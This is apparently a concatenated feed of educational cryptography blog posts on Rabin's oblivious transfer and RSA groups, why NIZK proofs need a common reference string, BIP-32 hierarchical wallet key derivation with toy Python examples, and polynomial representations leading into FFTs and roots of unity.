:bulb: Cool Fact: The original paper was written by hand! Tal Rabin noticed that the copies were becoming hard to find and decided to upload a scanned version. You can find the original manuscript as well as a typeset version on ePrint. (Paper link)
:bulb: Cool Fact 2: Tal is Michael’s daughter.
A few years later, in 1985, Even, Goldreich and Lempel gave a construction of OT as we have defined it here, where one of two messages is retrieved. (Paper link)
Since then, various constructions have been proposed for OT. One of them, titled “The Simplest Protocol for Oblivious Transfer” by Chou and Orlandi, published in 2015, is what we will see today in greater detail.
In this section we’ll see the original construction of Michael Rabin for “OT”; we put “OT” in quotes since it doesn’t really match our definition of OT. I start with it both as a nice historical lesson and because it gives a good sense of the underlying concepts from which OT can be built!
In this “OT” protocol we have two parties, Alice and Bob. At the beginning of the protocol Alice holds a message $m$ while Bob has no input. At the end of the protocol we want Bob to learn $m$ with probability $1/2$ and learn nothing with probability $1/2$, without Alice knowing whether Bob eventually learned $m$ or not!
The construction of the protocol relies on RSA groups, so first let’s recall what RSA groups are.
Given two distinct primes $p,q$ we call $N=pq$ an RSA-modulus. We denote by $\mathbb{Z}_N^*$ the set of numbers between $1$ and $N-1$ that are coprime to $N$. Notice that any number sharing a common factor with $N$ has to be a multiple of at least one of its prime factors, which are $p$ and $q$, so $\mathbb{Z}^*_N$ is the set of all numbers between $1$ and $N-1$ that are neither a multiple of $p$ nor of $q$.
An RSA group is a group whose elements are $\mathbb{Z}^*_N$ for some RSA-modulus $N$ and whose group operation is multiplication modulo $N$.
Let’s have an example. Let $p=3$ and $q=5$; we have $N=15$ so $\mathbb{Z}^*_N=\lbrace 1,2,4,7,8,11,13,14\rbrace$. Our RSA group operation will take two numbers from $\mathbb{Z}^*_N$ and multiply them modulo $15$, for example $4*7=28 \equiv 13 \mod 15$. So if we apply the group operation on $4$ and $7$ we get $13$.
One characteristic of groups is that each element should have an inverse. We say that $a,b$ are inverses of each other if $a*b=1$ according to the group operation. For example $2*8=16 \equiv 1 \mod 15$, so $2$ and $8$ are the inverse of each other!
One question you may ask is: “Given a number $a$ in $\mathbb{Z}_N^*$, how fast can we find its inverse?”. Perhaps surprisingly, finding the inverse of $a$ in the RSA group can be done very efficiently (via the extended Euclidean algorithm) even without knowing $p,q$, the factors of $N$; knowing the factors (together with the Chinese Remainder Theorem) makes such computations even more convenient. The operations that are believed to be hard given only $N$ are of a different kind, such as extracting roots modulo $N$. We don’t really know how hard this is, but we assume that for sufficiently large $p,q$ it takes a very long time. This assumption is the RSA assumption, and this is also what Rabin assumed while constructing his original OT.
This is only cryptographers’ real lives :wink: ↩
In this post I assume the reader is familiar with the term NIZK (Non-Interactive Zero-Knowledge), what people these days also call “zk-SNARKs”. I’m by no means an expert in ZK (Zero Knowledge), so you are not expected to be familiar with all the low-level technical details used to construct such argument systems. If you’ve never heard about NIZK/SNARKs, check out Wikipedia’s page about it, until maybe some day I’ll write something about it myself!
I’ll also be assuming some familiarity with basic concepts from complexity theory, but if there’s anything on this part that is left uncovered, feel free to contact (see the contact page).
Ok, so you’ve probably heard something about SNARKs in the past and have heard about different projects which incorporate some sort of a Non-Interactive ZK to establish some application, typically a distributed ledger. Some of these projects include: StarkWare, zk-Sync, ZCash, Mina, Dark Forest, Aleo and many others.
These projects rely on what’s called a proof system (or better yet, an argument system). This system is typically the core foundation of the cryptography enabling these projects. In short, these systems are the NIZKs/SNARKs, and in the past few years a myriad of such systems were published, pushing the boundaries of efficiency and security one step at a time. Just to name a few of these systems, we have Groth16, PLONK, Bulletproofs, STARKs, Ligero, Halo, Marlin, Sonic, and probably by the time I finish writing this post at least one more will have been published.
Now if you ever get into any of these projects’ documentation you’ll find (or at least I really hope you’ll find) some information containing the term “setup”, typically accompanied by the term “trusted” or “trustless”. This term is used to convey the message that each of these projects was initially bootstrapped by a process (a setup) which is either “trustless” or “trusted”. In the “trusted” flavor a user has to believe that the parties who took part in the setup behaved honestly, while in the “trustless” flavor no such belief is required. The result of this setup (either trusted or trustless) is what is typically called a CRS (Common Reference String). This is a public string containing some parameters that are later used by the argument system. Just as an example, the trusted setup of the Groth16 system (paper link) yields what’s known as the “Powers of Tau”, since the CRS simply contains a set of powers of some group element, denoted with $ \tau $ (the greek letter Tau).
Some of you might have asked yourselves, “Why is a trusted setup needed?”. You probably won’t be surprised to find the same question on stackexchange. While the answers to this question have their merit (I’m not here to criticize any of them), they typically revolve around why a trusted setup is used compared to a trustless setup. None of these answers explains why the setup is needed at all! This is also portrayed well in Vitalik Buterin’s great post about trusted setups. Let me quote the beginning of his post:
Many cryptographic protocols, especially in the areas of data availability sampling and ZK-SNARKs depend on trusted setups. A trusted setup ceremony is a procedure that is done once to generate a piece of data that must then be used every time some cryptographic protocol is run.
Why must this piece of data be used? After all, even these trustless-setup systems still have to run some setup procedure, and this setup typically makes at least some cryptographic assumptions. For example, the STARK CRS is secure only assuming CRH (collision-resistant hashing). Now, I’m obviously not here to disprove the CRH assumption, but if there’s something more secure than a trustless setup, it’s having no setup at all, right? If so, why haven’t we seen “setup-less” NIZK systems?
The answer to this question is going to be the topic of this post. Let’s begin!
The notion of interactive proof (IP) systems, followed by the notion of Zero-Knowledge proofs, was established in the mid-1980s in the seminal [GMR] paper by Goldwasser, Micali and Rackoff (Title: “The Knowledge Complexity Of Interactive Proof Systems”), in which they show how a proof system may possess the property of zero-knowledge. The main idea in the paper is that if a prover $ P $ wants to prove something to a verifier $ V $, usually some information could leak in the process of proving. Let’s have an example. Say we want to design a proof system to show that some number $ n $ is composite (i.e., it isn’t prime). The most naive way to do so would be having the prover send some number $ k $ to the verifier, who will check that the given number $ k $ really divides $ n $. This is great, but notice that the verifier not only learned that $ n $ is composite, but also learned that $ k $ is a divisor of $ n $.
So, in their paper they have defined a new complexity class, denoted $ KC(0) $, which stands for “Knowledge-Complexity 0” that became later known as zero-knowledge as we know it today.
It didn’t take long until it was proven that all problems in $ NP $ have zero-knowledge proof systems, in the amazing paper by Goldreich, Micali and Wigderson link, also known as GMW. (Title: Proofs that Yield Nothing But Their Validity or All Languages in NP Have Zero-Knowledge Proof Systems).
As a side note for those who don’t know about $ NP $, think of it as the set of problems for which a prover can give a proof which isn’t too long and that can be efficiently verified by the verifier.
While this sounds really exciting, the constructed proof-system for all problems in $ NP $ was still interactive, but we’re interested in non-interactive zero-knowledge (NIZK) proof systems! So, a short time after GMW, Blum, Feldman and Micali published a paper about NIZK (Title: Non-interactive zero-knowledge and its applications). In their paper they show how any language in $ NP $ can have a NIZK proof-system if some short random string is shared between the prover and the verifier, this is the common reference string (CRS)!
But still, the fact that some construction used a CRS doesn’t mean it is mandatory, right? Yes, and this is exactly what led Goldreich and Oren to publish, in the mid-1990s, their paper dealing with precisely this question (Title: Definitions and Properties of Zero-Knowledge Proof Systems). In their paper they prove that any NIZK not using a CRS is limited to proofs for problems in $BPP$.
Roughly speaking, $ BPP $ is the set of problems having efficient randomized algorithms that decide them with good probability.
Unless something very unexpected happens in the future, we believe that $ BPP $ isn’t a very “big” set of interesting problems. More concretely, when using your favorite SNARK, you create a proof that a certain circuit is satisfiable. The circuit-satisfiability problem is in $ NP $ and, unless some very unexpected news comes from the complexity theory guys, this problem isn’t in $ BPP $. So, according to Goldreich and Oren, to create a NIZK for circuit satisfiability we must have a CRS shared between the prover and the verifier. In the rest of the post we’ll try to prove this, because I think the idea behind the proof is quite simple and worth understanding.
Before proving, let’s recall what Zero-Knowledge really means. Conceptually, Zero-Knowledge means that no information is leaked in the process of proving. If no information is leaked, then the verifier should be able to generate a similar-looking proof transcript by itself, without any access to the proof, right? Because if it can do this then it learned nothing from the proof, and if it can’t, then there’s something in the proof itself that is helping the verifier create other “similar” proofs. In other words, the verifier can “simulate” the process of proving by itself.

More formally, given a prover $ P $ who wants to prove some statement $ x $ to a verifier $ V $, we say that the proof system is Zero-Knowledge if there exists an efficient randomized algorithm $ S $, which we call a simulator, which on input $ x $ yields an output, denoted $ S(x) $, that can be interpreted as a simulation of the interaction between the prover and the verifier. This definition is not 100% accurate, but let’s leave it like that, as it grasps the core notion of the full definition. The important thing to pay attention to is the fact that the simulator can create such transcripts without any access to a proof of the validity of the statement $ x $!

In any case, we say that the proof system is Zero-Knowledge if there’s no (efficient) way, given a string $ s $, to tell whether it is the output of such a simulator $ S(x) $ or an original proof transcript created by the prover $ P $ and the verifier $ V $. This basically means that if someone gives you a transcript from a ZK-proof interaction between a prover and a verifier, you can’t just believe him! This transcript could have been faked using such a simulator!
The idea of the proof by Goldreich and Oren goes like this: if a NIZK proof-system exists (and we know it does), it also has a simulator $ S(x) $. The output of the simulator should look just like the interaction between the prover and the verifier. However, since this is a non-interactive proof system, the whole transcript is just a single message sent from the prover to the verifier. So, the simulator should be able to create such transcripts, which are composed of only a single message from the prover to the verifier, without being given a valid proof. But if it does so, doesn’t it mean that the simulator is actually able to create valid proofs for $ x $? After all, the whole transcript is just the proof itself, unlike transcripts of interactive proof systems, and if an efficient randomized algorithm can create such proofs, then the problem for which we have created the proof system is in $ BPP $.
That’s pretty much it, without getting into the mathematical notation and rigorous definitions used by Goldreich and Oren.
As you can see, the “loophole” exploited in the proof can only exist in the case of non-interactive proof systems, where the output of the simulator is also a valid proof! This all means that interactivity gives a lot of power to interactive zero-knowledge proof systems, and only because this interactivity is lacking in NIZKs do we need some extra information to create a simulator. Typically the CRS contains information referred to as a “simulation trapdoor”: it gives the simulator some degrees of freedom in deciding the contents of the CRS, allowing it to create convincing transcripts without being able to produce valid proofs, which is exactly what went wrong in the proof above when we didn’t have a CRS.
That’s all for this time!
Some cryptography-based applications (such as cryptocurrencies) rely on the secure storage and usage of some secret, known as a cryptographic key. With more and more applications these days that make use of cryptography (especially as part of permissionless blockchains), users are required to maintain an increasing number of keys. Storing each key separately can cause a lot of mess and pain, so instead another approach can be considered. We can have a single “seed” (which must be kept secret!) with which we can derive a large number of seemingly “random” keys. To keep keys organized, this derivation mechanism can be hierarchical; for example, from this single seed we may want to be able to derive multiple “sub-seeds”. Each of these sub-seeds will be used to derive cryptographic keys for a different application (for example a different cryptocurrency). You can also think of another hierarchy level where each of these “application-subseeds” will derive various “account-subseeds”, so you can even have multiple accounts for each application. While the semantics here can change depending on the exact use case, the core idea is that from a single key, we want to deterministically derive large quantities of secrets in a hierarchical fashion. The terms “seed” or “subseed” will be substituted with just the term “key” for convenience.
These structures are usually referred to as HD-wallets, since their most popular use case is cryptocurrency wallets. In this post we will see how this hierarchical structure is generated and the different flavors of HD-wallets with their respective security considerations.
In this post I will assume that the reader is at least somewhat familiar with elliptic-curve public-key cryptography.
First, let’s go over how HD wallets work, for exact definitions please refer to BIP-32.
Since we are trying to create a hierarchical structure, we can think of all the keys generated by this mechanism as part of this hierarchy. Hierarchical structures are usually visualized using trees. The single “seed” will be the root of the tree, and each key derived from it can be used to derive all the keys in its subtree. For example, consider the following figure:
Figure 1: An Example of a Key Derivation Tree
Starting from a key $k_0$ (the root of the tree, what we originally referred to as a “seed”) we can derive multiple keys $(k_1,k_2,k_3)$. These keys can also be used to derive even more keys, for example, in the figure $k_1$ was used to derive keys $k_4,k_5$. We also use the term “subkey” to tell that one key was derived from another, for instance $k_4$ is subkey number 1 of $k_1$ and $k_3$ is subkey number 2 of $k_0$. We will also use the $k[i]$ notation to denote the $i^{th}$ subkey of key $k$.
So far I’ve used the term “key” in a vague manner; this is because both private and public keys can be considered for this use case. While the scenario of a private key seems more “natural” (so the owner of a single key can generate as many addresses as he wants), the scenario of deriving public keys can also be useful. Let’s consider a real-life example: your favorite coffee shop decided to start accepting Bitcoin. To make an order, the customer stands in front of a touch screen, selects his drink from the menu and hits the “Payment” button. At this point the machine has to present the client a unique payment address. We don’t want two clients to use the same payment address because it would be much more complicated to distinguish between payments of different clients. Instead, the machine is able to generate a fresh address for each order and present it to the customer. However, we don’t want the machine to be able to derive the matching private keys as well, as that would pose a security risk. So, the machine will be able to derive the public addresses to which customers pay, but only the owner of the store will be able to derive (in the same manner) the matching private keys, which will be used to redeem the paid funds.
Notice that the public keys generated by the payment terminal should correspond to the private keys generated by the owner of the store.
So let’s think of $f$ as the function generating subkeys; one could generate the $i^{th}$ subkey of a key $K$ using $f(K,i)$. However, this doesn’t work so naively, because if we have a private key $k$ and public key $K=k\cdot G$ for some elliptic-curve base-point $G$, we want the $i^{th}$ private key generated by $k$ and the $i^{th}$ public-key generated by $K$ to match. In other words, $f(K,i) = f(k,i)\cdot G$. How can we construct $f$ to satisfy this property?
So, BIP-32, the standard for HD-wallets that was initially used by Bitcoin and later adopted by many other systems, solves the problem in an elegant manner. A public key $K$ can derive its $i^{th}$ subkey ($K[i]$) using (the “$||$” operator is concatenation): \(K[i] = K + h(K || i)\cdot G\)
where $h$ is some hash function with a sufficiently large output domain; if we use the secp256k1 curve, like BIP-32, we need $h$ to yield at least 256 bits of pseudorandom output.
Now given a private key $k$ we can derive its $i^{th}$ subkey ($k[i]$) using: \(k[i] = k + h((k\cdot G) || i)\) Notice that since we know the private key $k$, we can compute the matching public key $K=k\cdot G$ (used inside $h$). Now we can see that: \(\begin{align} k[i]\cdot G &= (k + h((k\cdot G) || i))\cdot G \\ &= k\cdot G + h((k\cdot G) || i)\cdot G \\ &= K + h(K || i)\cdot G \\ &= K[i] \end{align}\)
And we got the desired property that a private key and the matching public key will yield matching private keys and public keys.
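This matching-derivation property can be checked with a toy model. The sketch below replaces the elliptic-curve group with the multiplicative group modulo a prime, so “$k\cdot G$” becomes $g^k \bmod p$ and point addition becomes multiplication mod $p$; the prime, generator and hash encoding are all illustrative assumptions, not the real BIP-32 parameters:

```python
import hashlib

# Toy demo of the non-hardened identity k[i]*G == K[i].
# Group model: multiplicative group mod a Mersenne prime; the
# scalar (exponent) arithmetic is mod the group order p - 1.
p = 2**127 - 1            # illustrative prime; group order is p - 1
g = 5                     # analogue of the base point G

def h(K, i):
    # Hash the "public key" K together with index i, reduced into
    # the scalar range [0, p-2]. Encoding is purely illustrative.
    data = K.to_bytes(16, "big") + i.to_bytes(4, "big")
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % (p - 1)

k = 123456789             # private key
K = pow(g, k, p)          # matching public key, K = k*G

i = 1
k_i = (k + h(K, i)) % (p - 1)          # k[i] = k + h(K || i)
K_i = (K * pow(g, h(K, i), p)) % p     # K[i] = K + h(K || i)*G

assert pow(g, k_i, p) == K_i           # the two derivations match
```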
It will, therefore, take you by no surprise that the private key $k$ can derive its subkeys and also the subkeys of its matching public key $K$.
Well, as you might have noticed, there is a subtle issue here which some might consider a security bug. Let’s see what the difference is between two consecutive private subkeys $k[1]$ and $k[2]$, for instance: \(\begin{align} k[2] - k[1] &= (k + h(K || 2)) - (k + h(K || 1)) \\ &= h(K||2) - h(K||1) \end{align}\)
So, the difference between two consecutive private subkeys only depends on the public key, which isn’t supposed to be considered a secret! So if someone is given one of the subkeys $k[1]$ and the public key (which is, well … public!), then the next subkey can be computed using
\[k[2] = k[1] + h(K || 2) - h(K || 1)\]This, indeed, is a problem in some scenarios, and therefore the notion of hardening was introduced. So far we have seen non-hardened HD-key-derivation, in which the difference between consecutive private/public keys can be computed using the public key alone. In the hardened version the $i^{th}$ private subkey of a private key $k$ is computed as: \(k[i] = k + h(k || i)\)
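The leak in the non-hardened case can be demonstrated end to end. Again a toy model of the group (multiplicative mod a prime, so “$k\cdot G$” is $g^k \bmod p$) with illustrative numbers, not real secp256k1:

```python
import hashlib

# Given one non-hardened private subkey k[1] and the *public* key K,
# anyone can recover k[2]. All parameters below are illustrative.
p = 2**127 - 1
g = 5

def h(K, i):
    data = K.to_bytes(16, "big") + i.to_bytes(4, "big")
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % (p - 1)

k = 987654321
K = pow(g, k, p)

k1 = (k + h(K, 1)) % (p - 1)   # honest derivations by the key owner
k2 = (k + h(K, 2)) % (p - 1)

# The attacker knows only k1 and the public K:
k2_attack = (k1 + h(K, 2) - h(K, 1)) % (p - 1)
assert k2_attack == k2
```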
This makes the derivation more secure, in the sense that now the parent private key has to be compromised to compute the difference between consecutive private keys. However, given the matching public key $K=k\cdot G$, one cannot compute $K[i]$ in the hardened version, because $K[i] = K + h(k||i)\cdot G$ and the private key $k$ isn’t known to those who wish to derive only public keys!
In short, hardened key derivation can only be used by someone who knows the parent private key. Therefore, in some scenarios hardened key derivation isn’t applicable, for example, the touch screen in the coffee shop from the beginning of the post.
Ok, so we’re almost done, but there is one last caveat before you can tell everyone that you really know BIP-32. The thing is that we don’t necessarily want everyone to be able to derive keys. That is, if we use non-hardened key derivation, we can’t rely on the parent public keys being secret, because these are public keys after all! So, in order to restrict who can derive keys, we may want the derivation to depend not only on the public keys (in non-hardened mode) or the private keys (in hardened mode) but also on another source of entropy, known as chain codes. A little more formally, the derivation function $h$ will take not only the key $K/k$ and the index $i$ but also another input $c$, the chain code, so only those who know the chain code can derive the subkey. And to separate the chain code from the key/index we will use an HMAC function $h(k,M)$ instead of simply a hash function. We will also want each key to be derived alongside a fresh chain code; therefore, we will use $h$ of double the output size (for example, for secp256k1 keys we will use $h$ with 512 bits of output), where the first half of the output (denoted $h_L$) will be used to derive the new chain code and the second half of the output (denoted $h_R$) will be used to derive the key. For a given key $K$ we will denote the $i^{th}$ generated chain code using $c_K[i]$.
So we get the following formulas:
| | Non-Hardened | Hardened |
|---|---|---|
| Public Key | \(\begin{aligned}K[i]&=K+h_R(c,K\|i)\\ c_K[i] &= h_L(c,K\|i)\end{aligned}\) | X |
| Private Key | \(\begin{aligned}k[i]&=k+h_R(c,(k\cdot G)\|i)\\ c_k[i] &= h_L(c,(k\cdot G)\|i)\end{aligned}\) | \(\begin{aligned}k[i]&=k+h_R(c,k\|i)\\ c_k[i] &= h_L(c,k\|i)\end{aligned}\) |
One last note about chain-codes: they are not mandatory, and we could have done without them. Using them or not depends only on the security assumptions one is willing to make, specifically about the secrecy of public keys that can derive additional children.
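Hardened derivation with chain codes can be sketched in the spirit of BIP-32. Real BIP-32 uses HMAC-SHA512 keyed with the chain code, but serializes keys and indices differently (and hardened indices start at $2^{31}$); the encoding, scalar order and root values below are illustrative only:

```python
import hmac, hashlib

# Sketch of hardened derivation with chain codes: HMAC-SHA512 keyed
# with the chain code c; the left 32 bytes (h_L) become the new chain
# code and the right 32 bytes (h_R) tweak the private key.
ORDER = 2**127 - 2           # toy scalar order; secp256k1 has its own

def derive_hardened(k, c, i):
    data = k.to_bytes(16, "big") + i.to_bytes(4, "big")
    out = hmac.new(c, data, hashlib.sha512).digest()
    h_L, h_R = out[:32], out[32:]
    c_i = h_L                                        # new chain code
    k_i = (k + int.from_bytes(h_R, "big")) % ORDER   # new private key
    return k_i, c_i

k0, c0 = 123456789, b"\x01" * 32     # root key and root chain code
k1, c1 = derive_hardened(k0, c0, 1)  # child
k4, c4 = derive_hardened(k1, c1, 1)  # grandchild: k0 -> k1 -> k4
```

Note that without knowing the chain code `c0`, even someone holding a subkey cannot walk the tree, which is exactly the extra entropy the paragraph above asks for.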
That’s it! At this point you should pretty much know how BIP-32 is used and works. Notice that some technical aspects weren’t discussed:
For these and other technical details, please refer to BIP-32.
While reading, please remember that FFTs are a gigantic topic with lots of cool caveats, algorithms and use-cases. This post is intended to be merely an introduction to the topic. If you have further questions about this post, or if you find this topic interesting and want to discuss it or general aspects of crypto, feel free to reach out on Telegram or on Twitter.
Polynomials are a very interesting algebraic construct. In particular, they have many use cases in cryptography, such as SNARKs/STARKs, Shamir-Secret-Sharing (see my post about it), Ring-LPN and more. It’s 100% ok if you don’t know any of those buzzwords; I will not assume any prior knowledge about them. The only point here is that polynomials are very useful.
A quick recap on what are polynomials. A function $P(x)$ is a polynomial if it can be expressed using the following algebraic term:
\[P(x) = \sum_{i=0}^{n}a_ix^i\]For some non-negative integer $n$ and a set of $n+1$ numbers $a_0,a_1,\ldots,a_n$. In this post we will sometimes write only $P$ instead of $P(x)$ since all polynomials we will talk about are of a single variable, typically $x$.
Generally speaking, the elements $a_0,\ldots,a_n$ are elements of some field. In this article we will primarily focus on finite fields and thus assume this field to be a finite field of some prime size $\mathbb{Z}/p\mathbb{Z}$.
The degree of a polynomial is the largest index $i$ such that $a_i \neq 0$. For a polynomial $P(x)$ we denote its degree using $\deg{(P)}$. In the edge-case where $P(x)=0$, i.e., all coefficients are zero, we say that $\deg{(P)}=-\infty$.
Let $P(x)=\sum_{i=0}^{n}p_ix^i$ and $Q(x)=\sum_{i=0}^nq_ix^i$ be two polynomials of degree $n$ (so $p_n\neq 0$ and $q_n \neq 0$).
One thing we can do with $P,Q$ is adding them. So, the sum of $P$ and $Q$ is:
\[Q+P = \sum_{i=0}^{n}(p_i+q_i)x^i\]In terms of computational complexity, the addition of two degree-$n$ polynomials takes $\mathcal{O}(n)$ field operations. In other words, the amount of time it takes to add two degree-$n$ polynomials is linear in the degree of the polynomials. This is because, as the formula suggests, there are $n+1$ coefficients in the resulting polynomial and each coefficient can be computed with a single addition of two field elements.
We can also multiply $P$ and $Q$ by each other. But when it comes to multiplication, things get a little bit more complicated. The product of $P$ and $Q$ is:
\[Q \cdot P = \sum_{i=0}^{n}\sum_{j=0}^{n}p_iq_jx^{i+j}\]First, notice that the degree of the resulting polynomial is $2n$, so by multiplying we get a polynomial of a higher degree.
As this formula suggests, the multiplication takes $\mathcal{O}(n^2)$ time: for each of the $n+1$ coefficients of $P$ we multiply it by each of the coefficients of $Q$, performing as many as $(n+1)\cdot(n+1)$ field multiplications. Along the way we also perform $\mathcal{O}(n^2)$ field additions to sum the field multiplication results.
As some of you may find it more appealing, we can also write the multiplication as:
\[Q \cdot P = \sum_{i=0}^{2n}x^i\sum_{j=0}^{i}p_jq_{i-j}\]This is because the coefficient of $x^i$ in the resulting polynomial is the inner sum: $\sum_{j=0}^{i}p_jq_{i-j}$.
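Both the addition and the schoolbook multiplication formulas can be written directly in code; a minimal coefficient-representation sketch over a small, purely illustrative prime field:

```python
# Coefficient representation: poly[i] is the coefficient of x^i.
p = 97  # illustrative prime; all arithmetic is in Z/pZ

def poly_add(P, Q):
    # O(n): add coefficients position by position.
    n = max(len(P), len(Q))
    P = P + [0] * (n - len(P))
    Q = Q + [0] * (n - len(Q))
    return [(a + b) % p for a, b in zip(P, Q)]

def poly_mul(P, Q):
    # O(n^2): every coefficient of P meets every coefficient of Q,
    # and p_i * q_j contributes to the coefficient of x^(i+j).
    S = [0] * (len(P) + len(Q) - 1)
    for i, a in enumerate(P):
        for j, b in enumerate(Q):
            S[i + j] = (S[i + j] + a * b) % p
    return S

# (1 + 2x) * (3 + x) = 3 + 7x + 2x^2
print(poly_mul([1, 2], [3, 1]))  # [3, 7, 2]
```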
So, $\mathcal{O}(n^2)$ is nice, but can we do better? I mean, imagine if $P,Q$ are of degree $10^9$. It would be practically infeasible to multiply them!
At this point you’re probably wondering what all these have to do with FFTs. But don’t worry, I promised FFTs, and FFTs you will get. We’re getting there slowly but surely.
Recall the “unique-interpolation-theorem” I’ve discussed in a previous post of mine. This theorem claims that for each set of $n+1$ pairs of points ${(x_0,y_0),\ldots,(x_n,y_n)}$ such that for all $i \neq j$ we have $x_i \neq x_j$ there is a unique polynomial $P(x)$ of degree at most $n$ such that $P(x_i)=y_i$ for all $0\leq i\leq n$.
So far, to represent a polynomial $P$ of degree $n$, we used a set of $n+1$ coefficients $(p_0,…,p_n)$ such that $P(x)=\sum_{i=0}^n p_ix^i$. We call this the coefficient representation. The term represent means that using the given constraints, or information, we can uniquely identify a specific polynomial of degree $n$ that satisfies these constraints.
However, we can think of another way to represent a polynomial. Consider a fixed set of $n+1$ points $(x_0,…,x_n)$. To represent $P$ we can take the evaluations of $P$ at these points: $P(x_0),…,P(x_n)$. By the “unique-interpolation-theorem”, $P(x)$ is the only polynomial of degree $\leq n$ with the given evaluations at the given points. We call this the evaluation representation. In other words, the evaluation representation of a polynomial $P(x)$ of degree $\leq n$ is its evaluation on a set of predetermined points $(x_0,…,x_n)$.
Now let’s say we’re given two polynomials $P(x),Q(x)$ of degree $\leq n$ and we want to compute their addition $S(x)=P(x)+Q(x)$, and let’s assume both input polynomials are represented using the evaluation representation. We know that for each $x_0,…,x_n$ the following equation holds:
\[S(x_i) = P(x_i) + Q(x_i)\]So adding two polynomials represented by their evaluations takes only $n+1$ field operations (additions), by simply adding the evaluations at the respective evaluation points.
As for multiplying $P(x)$ and $Q(x)$ the following equation also holds:
\[S(x_i) = P(x_i) \cdot Q(x_i)\]So to multiply two polynomials in the evaluation-representation we only have to perform $n+1$ field operations (multiplications). This is because after the point-wise multiplication we will have the evaluation of the polynomial $S$ over the set of points ${x_i}$. This is exactly the evaluation-representation of $S$ (note that since the product has degree $\leq 2n$, pinning it down uniquely requires evaluations at $2n+1$ points, as we’ll see shortly). This is much faster than multiplying two polynomials using the coefficient-representation.
Given a polynomial $P(x)$ of degree $\leq n$ represented in the coefficient-representation. How long does it take to change its representation into the evaluation-representation over some points $(x_0,…,x_n)$?
We can do this by sequentially evaluating $P(x_i)$ for each $x_i$. Since each evaluation takes up to $n+1$ additions and $n+1$ multiplications, the evaluation of $n+1$ points takes $\mathcal{O}(n^2)$ time.
The opposite direction, in which we take a polynomial represented in the evaluation-representation and compute its coefficient-representation would take $\mathcal{O}(n^2)$ as well using the Lagrange-Interpolation algorithm (I have described it in a previous post).
As mentioned, the schoolbook algorithm to multiply two polynomials (in the coefficient representation) takes $\mathcal{O}(n^2)$. With our previous observation, however, we can think of another algorithm to multiply two degree $\leq n$ polynomials. In our new algorithm we take the polynomials, evaluate them over $2n+1$ points, multiply the evaluations and interpolate the evaluations to obtain the coefficients of the product-polynomial. For completeness the algorithm is given here:
Input: Two degree $\leq n$ polynomials $P(x)=\sum_{i=0}^np_ix^i$ and $Q(x)=\sum_{i=0}^nq_ix^i$.
Output: A polynomial $S(x)=\sum_{i=0}^{2n}s_ix^i$ of degree $\leq 2n$.
- Select arbitrary $2n+1$ distinct points $x_0,…,x_{2n}$.
- Compute ${\bf P}=(P(x_0),…,P(x_{2n}))$ and ${\bf Q}=(Q(x_0),…,Q(x_{2n}))$.
- Compute ${\bf S}=(P(x_0)\cdot Q(x_0),…,P(x_{2n})\cdot Q(x_{2n}))$.
- Interpolate ${\bf S}$ to create a polynomial $S(x)$ of degree $\leq 2n$.
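The steps above can be sketched as follows, using Horner evaluation and Lagrange interpolation over a small prime field (the prime and the choice of evaluation points are illustrative; we only need $2n+1$ distinct points):

```python
p = 97  # illustrative prime; all arithmetic is in Z/pZ

def evaluate(P, x):
    # Horner's rule on a coefficient-represented polynomial.
    acc = 0
    for c in reversed(P):
        acc = (acc * x + c) % p
    return acc

def interpolate(xs, ys):
    # Lagrange interpolation: coefficient representation of the
    # unique polynomial of degree < len(xs) through the points.
    n = len(xs)
    coeffs = [0] * n
    for i in range(n):
        # Build the basis polynomial L_i with L_i(x_j) = [i == j].
        basis, denom = [1], 1
        for j in range(n):
            if j == i:
                continue
            # Multiply basis by (x - x_j).
            basis = [(a - xs[j] * b) % p
                     for a, b in zip([0] + basis, basis + [0])]
            denom = denom * (xs[i] - xs[j]) % p
        scale = ys[i] * pow(denom, -1, p) % p
        coeffs = [(c + scale * b) % p
                  for c, b in zip(coeffs, basis + [0] * (n - len(basis)))]
    return coeffs

def mul_via_evaluation(P, Q):
    n = len(P) - 1                  # both inputs have degree <= n
    xs = list(range(2 * n + 1))     # 2n+1 arbitrary distinct points
    Se = [evaluate(P, x) * evaluate(Q, x) % p for x in xs]
    return interpolate(xs, Se)

print(mul_via_evaluation([1, 2], [3, 1]))  # [3, 7, 2]: (1+2x)(3+x)
```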
Let’s see how much time each step of the algorithm takes:
So, overall, our new algorithm takes $\mathcal{O}(n^2)$ time, just like the old algorithm. Not too bad.
Our current bottleneck of the algorithm is changing the representation of the polynomial back and forth between coefficient and evaluation representations. If only we could do those faster, our multiplication algorithm will be faster overall.
Remember we have chosen the evaluation points $(x_0,…,x_n)$ of our evaluation-representation 100% arbitrarily. What if these points weren’t chosen arbitrarily? Are there specific points with which we can change representations faster?
Well, apparently the answer is yes! and this is exactly where Fast-Fourier-Transforms (FFTs) come to the rescue.
Just like polynomials are defined over a specific field, so are FFTs. The field can be either a finite field (e.g. $\mathbb{Z}/p\mathbb{Z}$, the finite field of prime size $p$) or infinite (e.g. $\mathbb{C}$, the field of complex numbers), but it has to be a field.
FFTs can be used to change the representation of a polynomial $P(x)$ of degree $\lt n$ with coefficients in some field $F$ from coefficient-representation to evaluation-representation (and vice-versa), where the evaluation is given specifically over $n$ unique field elements which are $n^{\text th}$ roots of unity.
So what are roots of unity?
We begin with a definition.
Definition [root of unity]: Let $r$ be an element of some field and let $i$ be a positive integer. We say that $r$ is a root of unity of order $i$ (or an $i^\text{th}$ root of unity) if $r^i = 1$ in the field. For the finite field $\mathbb{Z}/p\mathbb{Z}$ this means $r^i \equiv 1\quad (\text{mod}\ p)$, where the power and equivalence follow the finite-field arithmetic.
So ROUs are, as their name suggests, roots of the unit element of the field. Let’s have an example. Consider $\mathbb{Z}/5\mathbb{Z}$, the finite field with 5 elements $\{0,1,2,3,4\}$ with modulo-5 addition and multiplication. Now, let’s look at the powers of the field element $e=2$.
\[\begin{align} e^1 &= 2 \\ e^2 &= 4 \\ e^3 &= 3 \\ e^4 &= 1 \\ \end{align}\]Now, since $e^4=1$ it is a root of unity of order 4.
Great, now let’s consider another element, say $4$. We know that $e^2=4$ and thus,
\[4^2 = (e^2)^2 = e^4 = 1\]So 4 is a root of unity of order 2. However, since $4^2 = 1$ we can also tell that 4 is a root of unity of order 4, because:
\[4^4 = (4^2)^2 = 1^2 = 1\]In fact, we can prove an even deeper theorem about roots-of-unity:
Theorem: Let $r$ be a root of unity of order $i$. Then $r$ is also a root of unity of order $n$ for every $n$ such that $i|n$ ($i$ divides $n$).
